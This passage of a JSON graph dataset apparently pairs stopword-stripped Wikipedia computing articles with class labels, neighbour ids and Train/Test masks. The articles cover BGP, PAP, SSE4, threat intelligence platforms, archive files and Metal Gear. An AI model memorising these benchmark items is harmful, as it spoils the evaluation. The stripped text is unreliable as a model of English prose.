backbone method also successfully avoids overhead route flap damping ibgp sessions however subsequent research shown flap damping actually lengthen convergence times cases cause interruptions connectivity even links flapping moreover backbone links router processors become faster network architects suggested flap damping may important used since changes routing table handled much faster routers led ripe routing working group write current implementations bgp flap damping application flap damping isp networks recommended ... flap damping implemented isp operating network cause side-effects customers internet users customers content services ... side-effects would quite likely worse impact caused simply running flap damping improving stability without problems flap damping subject current research one largest problems faced bgp indeed internet infrastructure whole growth internet routing table global routing table grows point older less capable routers cope memory requirements cpu load maintaining table routers cease effective gateways parts internet connect addition perhaps even importantly larger routing tables take longer stabilize see major connectivity change leaving network service unreliable even unavailable interim late 2001 global routing table growing exponentially threatening eventual widespread breakdown connectivity attempt prevent isps cooperated keeping global routing table small possible using classless inter-domain routing cidr route aggregation slowed growth routing table linear process several years expanded demand multihoming end user networks growth superlinear middle 2004 full ipv4 bgp table excess 512,000 prefixes many older routers limit 512k 512,000–524,288 routing table entries august 12 2014 outages resulting full tables hit ebay lastpass microsoft azure among others number cisco routers commonly use tcam form high-speed content-addressable memory storing bgp advertised routes impacted routers tcam default allocated 512k entries ipv4 routes 512k entries ipv6 routes reported number ipv6 advertised routes 20k number advertised ipv4 routes reached default limit causing spillover effect routers attempted compensate issue using slow software routing opposed fast hardware routing via tcam main method dealing issue involves operators changing tcam allocation allow ipv4 entries reallocating tcam reserved ipv6 routes requires reboot routers 512k problem predicted advance number professionals actual allocations pushed number routes 512k announcement 15,000 new routes short order starting 07:48 utc almost routes verizon autonomous systems 701 705 created result deaggregation larger blocks introducing thousands new routes making routing table reach 515,000 entries new routes appear reaggregated within 5 minutes instability across internet apparently continued number hours even verizon caused routing table exceed 512k entries short spike would happened soon anyway natural growth route summarization often used improve aggregation bgp global routing table thereby reducing necessary table size routers consider as1 allocated big address space would counted one route table due customer requirement traffic engineering purposes as1 wants announce smaller specific routes prefix hosts as1 announce specific route counts as1 announcing four routes as2 see four routes as1 routing policy as2 decide whether take copy four routes overlaps specific routes store summary as2 wants send data prefix sent routers as1 route as1 router either dropped destination unreachable icmp message sent back depending configuration as1 routers as1 later decides drop route leaving as1 drop number routes announces three as2 see three routes depending routing policy as2 store copy three routes aggregate prefix thereby reducing number routes as2 stores two as2 wants send data prefix dropped destination unreachable icmp message sent back routers as2 as1 would routing table rfc 1771 border gateway protocol 4 bgp-4 planned coding numbers 16 bits 64510 possible public since asn 64512 65534 reserved private use 0 65535 forbidden 2011 15000 numbers still available projections envisioning complete depletion available numbers september 2013 rfc 6793 extends coding 16 32 bits keeping 16 bits range 0 65535 reserved numbers allows 4 billion available additional private range also defined rfc 6996 4200000000 4294967294 4294967295 forbidden rfc 7300 allow traversal router groups able manage new asns new attribute ot as4_path used 32 bits asn assignments started 2007 another factor causing growth routing table need load balancing multi-homed networks trivial task balance inbound traffic multi-homed network across multiple inbound paths due limitation bgp route selection process multi-homed network announces network blocks across bgp peers result may one several inbound links become congested links remain under-utilized external networks picked set congested paths optimal like routing protocols bgp detect congestion work around problem bgp administrators multihomed network may divide large contiguous ip address block smaller blocks tweak route announcement make different blocks look optimal different paths external networks choose different path reach different blocks multi-homed network cases increase number routes seen global bgp table one method growing popularity address load balancing issue deploy bgp/lisp locator/identifier separation protocol gateways within internet exchange point allow ingress traffic engineering across multiple links technique increase number routes seen global bgp table design routers running bgp accept advertised routes bgp routers default allows automatic decentralized routing traffic across internet also leaves internet potentially vulnerable accidental malicious disruption known bgp hijacking due extent bgp embedded core systems internet number different networks operated many different organizations collectively make internet correcting vulnerability introducing use cryptographic keys verify identity bgp routers technically economically challenging problem extension bgp use multipathing typically requires identical med weight origin as-path although implementations provide ability relax as-path checking expect equal path length rather actual numbers path expected match extended features like cisco dmzlink-bw enables ratio traffic sharing based bandwidth values configured individual links multiprotocol extensions bgp mbgp sometimes referred multiprotocol bgp multicast bgp defined ietf nowiki rfc 4760 /nowiki extension bgp allows different types addresses known address families distributed parallel whereas standard bgp supports ipv4 unicast addresses multiprotocol bgp supports ipv4 ipv6 addresses supports unicast multicast variants multiprotocol bgp allows information topology ip multicast-capable routers exchanged separately topology normal ipv4 unicast routers thus allows multicast routing topology different unicast routing topology although mbgp enables exchange inter-domain multicast routing information protocols protocol independent multicast family needed build trees forward multicast traffic multiprotocol bgp also widely deployed case mpls l3 vpn exchange vpn labels learned routes customer sites mpls network order distinguish different customer sites traffic customer sites comes provider edge router pe router routing bgp4 standard internet routing required internet service providers isps establish routing one another large private ip networks use bgp internally example joining number large open shortest path first ospf networks ospf scale size required another reason use bgp multihoming network better redundancy either multiple access points single isp multiple isps routers especially small ones intended small office/home office soho use may include bgp software soho routers simply capable running bgp using bgp routing tables size commercial routers may need specific software executable image contains bgp license enables open source packages run bgp include gnu zebra quagga openbgpd bird xorp vyatta devices marketed layer 3 switches less likely support bgp devices marketed routers high-end layer 3 switches usually run bgp products marketed switches may may size limitation bgp tables 20,000 routes far smaller full internet table plus internal routes devices however may perfectly reasonable useful used bgp routing smaller part network confederation-as representing one several smaller enterprises linked bgp backbone backbones small enterprise announces routes isp accepts default route perhaps small number aggregated routes bgp router used network single point entry internet may much smaller routing table size hence ram cpu requirement multihomed network even simple multihoming modest routing table size see rfc 4098 vendor-independent performance parameters single bgp router convergence control plane actual amount memory required bgp router depends amount bgp information exchanged bgp speakers way particular router stores bgp information router may keep one copy route manage different policies route advertising acceptance specific neighboring term view often used different policy relationships running router one router implementation takes memory per route another implementation may legitimate design choice trading processing speed memory full ipv4 bgp table excess 590,000 prefixes large isps may add another 50 internal customer routes depending implementation separate tables may kept view different peer notable free open source implementations bgp include systems testing bgp conformance load stress performance come vendors",
    "neighbors": [
      10242,
      1030,
      8211,
      6681,
      6682,
      6172,
      10271,
      8224,
      6689,
      9251,
      2085,
      7208,
      7214,
      8238,
      562,
      1586,
      9269,
      11321,
      3133,
      5181,
      6719,
      6723,
      8265,
      4687,
      10341,
      10344,
      3695,
      4723,
      2679,
      4729,
      5251,
      649,
      9868,
      3218,
      9365,
      11413,
      152,
      157,
      2206,
      3742,
      8862,
      9380,
      9381,
      3751,
      3752,
      172,
      10924,
      686,
      6318,
      6834,
      9909,
      4793,
      7865,
      4797,
      702,
      8386,
      7364,
      8905,
      1229,
      5843,
      10461,
      7391,
      3297,
      2797,
      751,
      8432,
      8946,
      3322,
      5890,
      9987,
      3847,
      2825,
      5397,
      10005,
      5402,
      5405,
      9511,
      7984,
      10035,
      8504,
      2362,
      10748,
      829,
      5437,
      2373,
      2887,
      10058,
      849,
      6993,
      1876,
      2904,
      9048,
      5978,
      7003,
      5469,
      5470,
      5471,
      5472,
      10589,
      871,
      6504,
      361,
      11112,
      367,
      1391,
      9080,
      891,
      6524,
      11647,
      10115,
      6541,
      1935,
      7570,
      5531,
      10144,
      10659,
      933,
      4005,
      2983,
      6577,
      2996,
      10171,
      3006,
      9670,
      4556,
      2509,
      8669,
      8670,
      10723,
      10727,
      3564,
      4085,
      6651,
      3580,
      4095
    ],
    "mask": "Train"
  },
  {
    "node_id": 2086,
    "label": 9,
    "text": "L-attributed_grammar:l-attributed grammar l-attributed grammars special type attribute grammars allow attributes evaluated one depth-first left-to-right traversal abstract syntax tree result attribute evaluation l-attributed grammars incorporated conveniently top-down parsing syntax-directed definition l-attributed inherited attribute formula_1 right side formula_2 depends every s-attributed syntax-directed definition also l-attributed implementing l-attributed definitions bottom-up parsers requires rewriting l-attributed definitions translation schemes many programming languages l-attributed special types compilers narrow compilers based form l-attributed grammar strict superset s-attributed grammars used code synthesis either inherited attributes synthesized attributes associated occurrence symbol formula_5",
    "neighbors": [
      1952,
      7634,
      2144,
      2256
    ],
    "mask": "Train"
  },
  {
    "node_id": 2087,
    "label": 5,
    "text": "Password_Authentication_Protocol:password authentication protocol password authentication protocol pap password-based authentication protocol used point point protocol ppp validate users almost network operating system remote servers support pap pap specified pap considered weak authentication scheme weak schemes simple lighter computational overhead much vulnerable attack weak schemes may limited application constrained environments avoided general among pap deficiencies fact transmits unencrypted passwords i.e plain-text network pap therefore used last resort remote server support stronger scheme chap eap pap authentication done time initial link establishment verifies identity client using two-way handshake pap packet embedded ppp frame protocol field value c023 hex",
    "neighbors": [
      7,
      4242,
      8211,
      3477,
      2080,
      2083,
      9635,
      4663,
      5433,
      3007,
      5568,
      10058,
      8654,
      1618,
      6098,
      6750,
      2143,
      8670,
      2274,
      6888,
      8432,
      1012,
      8694
    ],
    "mask": "Test"
  },
  {
    "node_id": 2088,
    "label": 3,
    "text": "SSE4:sse4 sse4 streaming simd extensions 4 simd cpu instruction set used intel core microarchitecture amd k10 k8l announced september 27 2006 fall 2006 intel developer forum vague details white paper precise details 47 instructions became available spring 2007 intel developer forum beijing presentation sse4 fully compatible software written previous generations intel 64 ia-32 architecture microprocessors existing software continues run correctly without modification microprocessors incorporate sse4 well presence existing new applications incorporate sse4 intel sse4 consists 54 instructions subset consisting 47 instructions referred sse4.1 intel documentation available penryn additionally sse4.2 second subset consisting 7 remaining instructions first available nehalem-based core i7 intel credits feedback developers playing important role development instruction set starting barcelona-based processors amd introduced sse4a instruction set 4 sse4 instructions 4 new sse instructions instructions found intel processors supporting sse4.1 amd processors started supporting intel sse4.1 sse4.2 full sse4 instruction set bulldozer-based fx processors sse4a misaligned sse feature also introduced meant unaligned load instructions fast aligned versions aligned addresses also allowed disabling alignment check non-load sse operations accessing memory intel later introduced similar speed improvements unaligned sse nehalem processors introduce misaligned access non-load sse instructions avx known ssse3 supplemental streaming simd extensions 3 introduced intel core 2 processor line referred sse4 media intel came ssse3 moniker internally dubbed merom new instructions intel originally plan assign special name criticized journalists intel eventually cleared confusion reserved sse4 name next instruction set extension intel using marketing term hd boost refer sse4 unlike previous iterations sse sse4 contains instructions execute operations specific multimedia applications features number instructions whose action determined constant field set instructions take xmm0 implicit third operand several instructions enabled single-cycle shuffle engine penryn shuffle operations reorder bytes within register instructions introduced penryn microarchitecture 45 nm shrink intel core microarchitecture support indicated via cpuid.01h ecx.sse41 bit 19 flag sse4.2 added sttni string text new instructions several new instructions perform character searches comparison two operands 16 bytes time designed among things speed parsing xml documents also added crc32 instruction compute cyclic redundancy checks used certain data transfer protocols instructions first implemented nehalem-based intel core i7 product line complete sse4 instruction set support indicated via cpuid.01h ecx.sse42 bit 20 flag instructions operate integer rather sse registers simd instructions appear time although introduced amd sse4a instruction set counted separate extensions dedicated cpuid bits indicate support intel implements popcnt beginning nehalem microarchitecture lzcnt beginning haswell microarchitecture amd implements beginning barcelona microarchitecture amd calls pair instructions advanced bit manipulation abm encoding lzcnt similar enough bsr bit scan reverse lzcnt performed cpu supporting intel cpu prior haswell perform bsr operation instead raising invalid instruction error despite different result values lzcnt bsr trailing zeros counted using bsf bit scan forward tzcnt instructions sse4a instruction group introduced amd barcelona microarchitecture instructions available intel processors support indicated via cpuid.80000001h ecx.sse4a bit 6 flag",
    "neighbors": [
      9337,
      3459,
      9092,
      2821,
      1798,
      3973,
      4491,
      4108,
      4237,
      5645,
      6924,
      9611,
      5649,
      4886,
      6038,
      3352,
      9111,
      1178,
      7963,
      9369,
      9500,
      2719,
      5883,
      3883,
      2094,
      9391,
      8126,
      8120,
      8506,
      2237,
      1085,
      5309,
      8125,
      833,
      6978,
      6339,
      5444,
      6596,
      3142,
      7234,
      9541,
      11080,
      2764,
      1998,
      5326,
      977,
      2514,
      5073,
      5844,
      9428,
      4603,
      8795,
      2655,
      1119,
      479,
      1122,
      7783,
      1000,
      8680,
      10985,
      4204,
      8684,
      5358,
      5871,
      8944,
      1137,
      9582,
      499,
      9964,
      1399,
      9976,
      4217,
      1915,
      10620
    ],
    "mask": "Test"
  },
  {
    "node_id": 2089,
    "label": 1,
    "text": "IBM_Query_Management_Facility:ibm query management facility ibm db2 query management facility qmf z/os business analytics software solution developed ibm originally created reporting interface ibm db2 z/os database used many customers generate reports key business decisions inception qmf ’ reports green-screen reports could accessed online qmf modern visual dashboarding analytical solution handles data db2 z/os also structured unstructured data sources oracle teradata adabas hadoop webpages dashboards reports deployed via workstation gui browser tablet embedded within applications 1 official ibm site",
    "neighbors": [
      6850,
      10340,
      5051,
      10280,
      4630,
      8154,
      3323,
      4255
    ],
    "mask": "Train"
  },
  {
    "node_id": 2090,
    "label": 4,
    "text": "Threat_Intelligence_Platform:threat intelligence platform threat intelligence platform emerging technology discipline helps organizations aggregate correlate analyze threat data multiple sources real time support defensive actions tips evolved address growing amount data generated variety internal external resources system logs threat intelligence feeds help security teams identify threats relevant organization importing threat data multiple sources formats correlating data exporting organization ’ existing security systems ticketing systems tip automates proactive threat management mitigation true tip differs typical enterprise security products system programmed outside developers particular users platform tips also use apis gather data generate configuration analysis whois information reverse ip lookup website content analysis name servers ssl certificates traditional approach enterprise security involves security teams using variety processes tools conduct incident response network defense threat analysis integration teams sharing threat data often manual process relies email spreadsheets portal ticketing system approach scale team enterprise grows number threats events increases attack sources changing minute hour day scalability efficiency difficult tools used large security operations centers socs example produce hundreds millions events per day endpoint network alerts log events making difficult filter manageable number suspicious events triage threat intelligence platforms make possible organizations gain advantage adversary detecting presence threat actors blocking tackling attacks degrading infrastructure using threat intelligence businesses government agencies also identify threat sources data useful relevant environment potentially reducing costs associated unnecessary commercial threat feeds tactical use cases threat intelligence include security planning monitoring detection incident response threat discovery threat assessment tip also drives smarter practices back siems intrusion detection security tools finely curated relevant widely sourced threat intelligence tip produces advantage held tips ability share threat intelligence stakeholders communities adversaries typically coordinate efforts across forums platforms tip provides common habitat makes possible security teams share threat information among trusted circles interface security intelligence experts receive guidance implementing coordinated counter-measures full-featured tips enable security analysts simultaneously coordinate tactical strategic activities incident response security operations risk management teams aggregating data trusted communities threat intelligence platforms made several primary feature areas allow organizations implement intelligence-driven security approach stages supported automated workflows streamline threat detection management analysis defensive process track completion threat intelligence platforms deployed software appliance physical virtual on-premises dedicated public clouds enhanced community collaboration",
    "neighbors": [
      4194,
      612,
      10213,
      326,
      8998,
      4873,
      7210,
      8204,
      10252,
      176,
      9744,
      11611,
      10196,
      5563
    ],
    "mask": "Test"
  },
  {
    "node_id": 2091,
    "label": 8,
    "text": "Direct_Internet_Message_Encapsulation:direct internet message encapsulation direct internet message encapsulation dime microsoft-proposed internet standard early 2000s streaming binary encapsulated data internet according ietf web site standard withdrawn never made rfc status however microsoft one time recommend dime transmitting files via web services also used java ee differences implementation protocol made difficult first version submitted ietf november 2001 last update submitted june 2002 december 2003 dime lost competition message transmission optimization mechanism soap attachments microsoft describes dime superseded soap message transmission optimization mechanism mtom specification standard intended improved version mime particular difficulty mime message must encoded text sections separated separator given message header means entire stream data must known sender starting communication choose separator occur data useful entire stream available communication initiated searching expensive dime oriented streaming allowing example receiver process chunks message arrive without wait entire message dime defined transmission format data link layer osi model although typically transmitted http one difficulty could form http message essentially size limit size information chunk 32 bits 1 gigabit many http receivers unused messages large buffered messages would simply fail expecting short message receiving huge one moreover http receiver secured would receiving message send back challenge message 400 code sender http connectionless would entirely lose possibly huge amount data sent accept deny challenge entirely satisfactory solution response challenge could course succeed expense sending data twice huge rather defeats point fair say method sending data http suffers problem alternate probably better solution criteria successful challenge e.g username password established out-of-band sent message first time receive challenge by-product connectionless http protocol since message treated individual message must able successfully include challenge response dime extremely fast compared practical applications protocols data binary rather say base64 encoded relatively compact chunking packet methods built protocol meant could streamed read suitable receiver whole message read dime defined data link layer possible encapsulate dime message another dime message would help compression purposes occasionally useful bypass networking infrastructure routers network layer os model would otherwise block encapsulated traffic binary may treat suspicion said protocols mime may equally suffer since dime generally used well-trusted clients specific port could opened router express purpose sending receiving dime traffic subvert security aspects since challenge would still occur merely accepted binary traffic norm port give numerous false positives",
    "neighbors": [
      2800,
      7865,
      6688
    ],
    "mask": "Test"
  },
  {
    "node_id": 2092,
    "label": 4,
    "text": "Sherwood_Applied_Business_Security_Architecture:sherwood applied business security architecture sabsa sherwood applied business security architecture framework methodology enterprise security architecture service management developed independently zachman framework similar structure sabsa model methodology developing risk-driven enterprise information security architectures delivering security infrastructure solutions support critical business initiatives primary characteristic sabsa model everything must derived analysis business requirements security especially security enabling function new business opportunities developed exploited process analyzes business requirements outset creates chain traceability strategy concept design implementation ongoing ‘ manage measure ’ phases lifecycle ensure business mandate preserved framework tools created practical experience support whole methodology model layered top layer business requirements definition stage lower layer new level abstraction detail developed going definition conceptual architecture logical services architecture physical infrastructure architecture finally lowest layer selection technologies products component architecture sabsa model generic starting point organization going process analysis decision-making implied structure becomes specific enterprise finally highly customized unique business model becomes reality enterprise security architecture central success strategic program information security management within organization sabsa particular example methodology used information technology ot operational technology environments note original sabsa matrix still valid today expanded comprehensive service management matrix updated detail terminology areas words david lynas sabsa author sabsa matrix sabsa service management matrix updated since late 90s redesigned deliver improvements feedback requested years fundamentally changed structure principles matrices elements changed position focussed terminology update consistency new versions downloaded along 2009 revision sabsa white paper important documents like sabsa certification roadmap sabsa members web site",
    "neighbors": [
      4873
    ],
    "mask": "Test"
  },
  {
    "node_id": 2093,
    "label": 5,
    "text": "Realm-Specific_IP:realm-specific ip realm-specific ip experimental ietf framework protocol intended alternative network address translation nat end-to-end integrity packets maintained rsip lets host borrow one ip addresses udp/tcp port one rsip gateways leasing usually public ip addresses ports rsip hosts located usually private addressing realms rsip client requests registration rsip gateway gateway turn delivers either unique ip address shared ip address unique set tcp/udp ports associates rsip host address address rsip host uses address send packets destinations realm tunnelled packets rsip host gateway contain addresses rsip gateway strips host address header sends packet destination rsip also used relay traffic several different privately addressed networks leasing several different addresses reach different destination networks rsip useful nat traversal ietf standard alternative universal plug play upnp protocol experimental stage yet widespread use",
    "neighbors": [
      2985,
      7214,
      3792,
      4084,
      5405
    ],
    "mask": "Test"
  },
  {
    "node_id": 2094,
    "label": 3,
    "text": "Piledriver_(microarchitecture):piledriver microarchitecture amd piledriver family 15h microarchitecture developed amd second-generation successor bulldozer targets desktop mobile server markets used amd accelerated processing unit formerly fusion amd fx opteron line processors changes bulldozer incremental piledriver uses module design main improvements branch prediction fpu/integer scheduling along switch hard-edge flip-flops improve power consumption resulted clock speed gains 8–10 performance increase around 15 similar power characteristics fx-9590 around 40 faster bulldozer-based fx-8150 mostly higher clock speed products based piledriver first released 15 may 2012 amd accelerated processing unit apu code-named trinity series mobile products apus aimed desktops followed early october 2012 piledriver-based fx-series cpus released later month opteron server processors based upon piledriver announced early december 2012 piledriver includes improvements original bulldozer microarchitecture k suffix denotes unlocked a-series processor fx-series processors unlocked unless otherwise specified opteron 32 nm processors leaked roadmaps showed piledriver cpus featuring ten cores part komodo platform komodo launch 2012 fm2 socket never happened amd kept am3+ socket fx series put piledriver-based apus fm2 2010 amd revealed 2nd generation scheduled 2012 amd referred generation enhanced bulldozer later generation bulldozer core codenamed piledriver june 11 2013 amd announced two additional fx-series eight piledriver core cpus fx-9590 fx-9370 running maximum turbo speed 5.0 ghz 4.7 ghz respectively making amd first company ever release 5 ghz cpu commercially amd specify 9xxx series processors require robust liquid cooling due high thermal design power tdp server market three versions stated development january 2013 amd officially introduced new series apus codenamed richland series features six new apus total fastest model a10-6800k featured two piledriver modules operating 4.1 ghz 4.4 ghz turbo mode integrated hd 8670d gpu 384 stream processors operating 844 mhz a10-6800k official ddr3-2133 memory support a10-6800k offered approximately 5 performance improvements performance applications 3d games a10-5800k trinity based predecessor largely due richland higher clock speeds higher overclocking potential trinity march 12 2013 amd officially introduced four richland mobile apus june 4 2013 amd officially announced six richland desktop apus january 2012 microsoft released two hotfixes 2646060 2645594 windows 7 server 2008 r2 significantly improved performance clustered multi-thread based amd cpus improving thread scheduling windows 8 supports cmt-based cpus box addressing core logical cores modules physical cores",
    "neighbors": [
      3586,
      8322,
      5380,
      9092,
      9475,
      6151,
      3464,
      4872,
      8327,
      10375,
      5645,
      398,
      4886,
      9369,
      7963,
      9500,
      4767,
      2719,
      9122,
      5541,
      8231,
      2088,
      11047,
      11183,
      6705,
      1461,
      9400,
      833,
      6978,
      7234,
      9541,
      11080,
      2764,
      9551,
      7122,
      9427,
      9428,
      473,
      5859,
      7783,
      5356,
      1005,
      9582,
      7151,
      9964,
      1137,
      2549,
      630,
      4603,
      3070
    ],
    "mask": "None"
  },
  {
    "node_id": 2095,
    "label": 6,
    "text": "Archive_file:archive file archive file file composed one computer files along metadata archive files used collect multiple data files together single file easier portability storage simply compress files use less storage space archive files often store directory structures error detection correction information arbitrary comments sometimes use built-in encryption archive files particularly useful store file system data metadata within contents particular file thus stored systems sent channels support file system question file contents – examples include sending directory structure email beyond archival purposes archive files frequently used packaging software distribution software contents often naturally spread across several files archive known package archival file format additional conventions contents requiring manifest file resulting format known package format examples include deb debian jar java apk android features supported various kinds archives include archive programs self-extraction self-installation source volume medium information package notes/description file extension file header archive file indicators file format used computer archive files created file archiver software optical disc authoring software disk image software archive format file format archive file formats well-defined authors become conventions supported multiple vendors communities filename extensions used distinguish different types archives include zip rar 7z tar java also introduced whole family archive extensions jar war j java w web used exchange entire byte-code deployment sometimes also used exchange source code text html xml files default compressed archive files often include parity checks checksums error detection instance zip files use cyclic redundancy check crc rar archives may include redundant error correction data called recovery records archive files sometimes accompanied separate parity archive par files allow additional error detection recovery particularly recovery missing files multi-file archive",
    "neighbors": [
      2432,
      11137,
      9988,
      1940,
      3222,
      9762,
      3366,
      3368,
      3114,
      3629,
      950,
      4406,
      11581,
      5054,
      10817,
      2755,
      11076,
      3659,
      5067,
      4174,
      10959,
      3280,
      4561,
      722,
      5969,
      8659,
      2389,
      6358,
      855,
      10070,
      3804,
      5096,
      10857,
      4459,
      8940,
      237,
      4845,
      6133
    ],
    "mask": "Test"
  },
  {
    "node_id": 2096,
    "label": 3,
    "text": "Metal_Gear_(video_game):metal gear video game metal gear overhead military action-adventure stealth video game originally released 1987 konami msx2 computer japan parts europe considered progenitor stealth game genre first video game designed hideo kojima would go direct sequels reworked port game released famicom months later later saw release international markets nes following two years version developed without kojima involvement features drastically altered level designs among changes faithful port msx2 version later included playstation 2 well game released playstation 3 xbox 360 playstation vita newer ports featuring revised translation additional gameplay features game revolves around solid snake operative special forces unit foxhound goes solo infiltration mission fortified state outer heaven destroy metal gear bipedal walking tank capable launching nuclear missiles anywhere world well rescue number fellow agents captured enemy game major international success nes version selling 1million units united states player controls military operative codenamed solid snake whose objective infiltrate enemy base avoiding visual contact direct confrontation patrolling guards player seen game enters alert mode situation snake must escape enemy sight order resume infiltration method escaping varies depending circumstances behind discovery snake starts mission unarmed arm numerous firearms explosives obtained throughout enemy stronghold weapon limited ammunition supplies replenished obtaining ammunition caches additional supplies suppressor also obtained allows player fire handgun submachine gun without making noise weapons also used clear obstacles hollow walls electrified floors snake also use fists punch defeat patrolling enemies occasionally player defeats guard punches without alerting anyone defeated guard yield single unit rations ammo box picked addition enemy guards player also confronted mercenaries challenge player combat serving boss characters enemy base consists three different buildings multiple floors including basement levels within player uses key cards items unlock doors explore new areas door open corresponding key cards information obtained rescuing hostages held within buildings rescuing five hostages player rank increase one star maximum rank four stars allowing increased carrying capacity maximum health however hostage killed player demoted previous rank transceiver available snake keep touch commanding officer big boss one resistance members operating covertly near outer heaven schneider diane jennifer snake allies specializes specific subject usually provide information advice based player current area although reply always guaranteed player must keep track character frequency number order remain contact throughout game msx2 version requires use tape drive sony bitcorder order save load game progress checkpoints game master ii cartridge also used enable save states via floppy disks point versions later platforms eliminated complicated requirements thanks standardized storage devices memory cards internal disk drives player character solid snake rookie member special forces group foxhound sent first mission assisted via radio commanding officer big boss offers information mission objectives items well local resistance movement composed leader schneider former architect guides snake layout fortress knows locations key items diane former positive punk vocalist provides information enemy forces home jennifer infiltrated outer heaven medical staff find missing brother assists snake inside agent among prisoners snake rescues includes grey fox gray fox later versions foxhound agent captured previous mission dr. pettrovich dr. drago pettrovich madnar later releases robotic engineer working outer heaven doctor daughter elen kidnapped enemy coerce father developing metal gear bosses include shoot gunner renamed shotmaker later versions former spetsnaz agent specializing riot gun machinegun kid former sas operative armed machine gun fire trooper former gsg 9 operative uses flamethrower coward duck dirty duck later releases boomerang throwing terrorist shields hostages arnold bloody brad later releases two tx-11 class androids designed dr. pettrovich legendary mercenary founded outer heaven whose true identity unknown end near end 20th century west discovers weapon mass destruction constructed inside outer heaven fortified state founded legendary mercenary 200 km north galzburg south africa special forces unit foxhound sends top agent gray fox infiltrate fortress assess situation neutralize threat foxhound loses contact gray fox days later last transmission metal gear ... discover happened gray fox foxhound commander big boss sends newest recruit solid snake area operation codenamed intrude n313 upon insertion outer heaven snake makes contact local resistance members schneider diane jennifer using skills equipment procures site manages rescue fox fox explains metal gear codename nuclear-equipped bipedal walking tank engage forms combat launch nuclear weapons location outer heaven plans use metal gear impose new world superpower destroy metal gear topple outer heaven mercenaries snake rescues lead metal gear engineer dr. pettrovich daughter elen scientist explains metal gear destroyed snake takes outer heaven troops however begins notice traps put way precise wonders information activities tracked big boss begins act strangely giving misleading advice leads snake several traps eventually ordering abort mission breaking fourth wall telling player turn system moreover schneider ambushed hostiles presumed dead losing contact snake snake penetrates outer heaven main base takes metal gear reaches completion safely escapes compound basement confronted mercenary leader outer heaven turns big boss corrupt leader reveals using connections steal military intelligence establish mercenary force fund activities aim outer heaven become world greatest superpower able bring even west knees rookie snake sent hoping captured feed misinformation authorities quite obviously underestimated snake capabilities lost metal gear much force big boss seemingly starts self-destruct sequence compound promises die alone snake join snake defeats big boss last battle escapes outer heaven compound crumbles flames behind end credits message big boss displayed saying meet solid snake kojima asked take project senior associate metal gear intended action game featured modern military combat however msx2 hardware limited number on-screen bullets enemies kojima felt impeded combat aspect inspired great escape reversed focus gameplay shooting enemy avoiding capture game titled intruder early planning stages packaging illustration used retail releases game depicts protagonist solid snake holding gun traced publicity still michael biehn posing character kyle reese 1984 film terminator kojima still newly employed konami time involvement production illustration metal gear originally released msx2 home computer japan july 13 1987 english version released europe year due memory constraints japanese version written entirely katakana character names presented roman letters english version written entirely uppercase numerous instances erroneous grammar misspellings features fewer radio calls japanese version 56 calls kept shortened messages august 18 2004 konami released port msx2 metal gear feature phones konami net dx service japan promotional tie-in updated port served basis version included second disc subsistence expanded edition metal gear solid 3 playstation 2 released 2005 later hd edition released playstation 3 xbox 360 2011 playstation vita 2012 msx2 metal gear would released virtual console download wii japan december 8 2009 rom used emulated re-release modified bring in-line later versions game released platforms port metal gear family computer famicom released japan december 22 1987 followed english localization nintendo entertainment system nes released north america june 1988 published konami ultra games division europe australia sometime 1989 notably first version metal gear released north america since msx2 platform commercialized market according kojima account port developed another konami division tokyo given source code msx2 version without consent original team many changes made porting process later led version publicly disowned kojima masahiro ueno worked programmer nes version stated staff worked port given three-month deadline ordered make port different possible msx2 version konami executives due hardware limitations mapper used metal gear boss ended replaced supercomputer guarded four enemy soldiers another big change made game level designs instead underwater infiltration original version game starts solid snake parachuting middle jungle alongside three soldiers never seen mentioned outside intro landing jungle player must reach transport truck end take snake entrance first building player also use transport trucks reach entrances buildings quicker since travel cyclical pattern basement floors building 1 2 msx2 version made separate buildings building 4 5 respectively reachable going one two jungle mazes located outdoor areas three buildings correct path take jungle maze never revealed game addition removal metal gear tank hind boss rooftop building 1 also replaced pair armed turret gunners called twin shot nes version also lacks higher alert phase msx2 version jetpack-wearing soldiers rooftops building 1 2 lost ability fly making act like regular guards hand enemies longer drop ammo rations punched death much like msx2 version english localization nes versions contains numerous instances erroneous grammar contact missing grey fox uh-oh truck started move feel asleep passcodes used version save progress snake killed enemy player given choice continue game last checkpoint quit resume later given passcode passcode keeps track snake rank also determines checkpoint version inventory hostages rescued bosses defeated certain event flags one particular passcode featured japanese north american version player types expletive fuck fills remaining spaces 1 transport player final battle equipment resulted passcode system altered european versions game vowels removed msx2 version released north america time nes version one served basis couple home computer ports released ultra games 1990 ms-dos commodore 64 emulated port famicom version also included bonus disc packaged alongside limited edition gamecube console bundle released exclusively japan msx2 version metal gear ranked msx magazine top 20 best selling msx games japan five months debuting 4 october 1987 issue peaking 3 following month games machine gave positive review version giving game 79 global note praised graphics size game area underlining fact ensured action suspense never wanes also wrote game rapidly addictive urge get game quite strong concluded positively quality game saying standard konami software maintained maybe people think hard joining 200,000 msx owners computer gaming world called nes version graphics acceptable criticized control system player great vulnerability unarmed start game nonetheless stated metal gear shows great promise future ultra games entries attempts move beyond standard run/jump/shoot format nes games concluded game potential super-hit unfortunately sabotaged weaknesses nes version metal gear ranked 104th best game made nintendo system nintendo power top 200 games list gamesradar ranked sixth-best nes game ever made staff felt popularized genre nes version major international success selling 1million units united states success led creation two separately produced sequels first one snake revenge produced specifically nes north america europe 1990 sequel developed hideo kojima released japan msx2 year response former creation latter followed metal gear solid playstation 1998 turn followed numerous sequels spinoffs see metal gear series intro theme operation intrude n313 main theme theme tara game theme another dead soldier msx2 version reused vr training theme metal gear solid turn reused theme tara one tunes heard shadow moses island stage super smash bros. brawl wii music beginning section battleship halberd interior stage adventure mode snake officially enters storyline also selected music ipod item 1988 konami published gamebook adaptation metal gear japan second installment konami gamebook series gamebook set two years events game solid snake called back action foxhound receives intelligence terrorist group obtained plans metal gear mass-producing mech book portrays solid snake unsuccessful illustrator personal life outside job foxhound agent 1990 novelization metal gear published u.s. scholastic books part worlds power series novelizations based third-party nes games metal gear book written alexander frost pen name f.x nine pen name used authors worlds power series book adheres much closely localized version backstory presented north american packaging manual opposed actual in-game plot changed reflect difference big boss featured book instead two different characters commander south colonel vermon cataffy serve solid snake commanding officer outer heaven leader respectively book also gives solid snake identity justin halley changes name organization fox hound snake men book targeted young kids cover illustration altered snake handgun airbrushed public q event conducted london geoff keighley march 13 2014 series creator hideo kojima expressed interest developing remakes msx2 metal gear games order reconcile plot discrepancies since introduced series plans time due ongoing development prequel set events original metal gear however kojima since departed konami following release phantom pain leaving possibility remakes question metal gear remake mod alien swarm development granted permission konami use copyrighted material agreement n't make profit recreation accept donations production canceled june 